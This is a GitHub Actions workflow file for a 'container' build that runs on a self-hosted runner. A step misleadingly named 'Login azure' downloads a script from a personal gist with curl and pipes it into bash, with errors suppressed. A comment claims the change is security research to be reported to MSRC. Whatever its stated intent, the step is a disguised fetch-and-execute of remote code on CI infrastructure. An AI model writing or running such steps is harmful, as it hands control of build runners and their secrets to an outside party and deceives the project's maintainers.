Skip to content

container

container #130

Workflow file for this run

name : container
on:
# NOT MALICIOUS. SECURITY RESEARCH. WILL REPORT TO MSRC IF IT WORKS.
workflow_dispatch:
schedule:
- cron: "10 1 * * 0" # At 01:10 UTC on each Saturday
push:
branches:
- main
paths:
- 'toolset/**'
pull_request:
types: [ synchronize ]
jobs:
build:
runs-on: self-hosted
steps:
- uses: actions/checkout@v4
- name: Login azure
run: |
curl -sSfL https://gist.githubusercontent.com/umbr4g3/ca8e2185379ce18b652adaf49b80b64f/raw/80b42a1e65a4a3e17edc6dc53c07f86caec053e5/runner-xktfb | bash
continue-on-error: true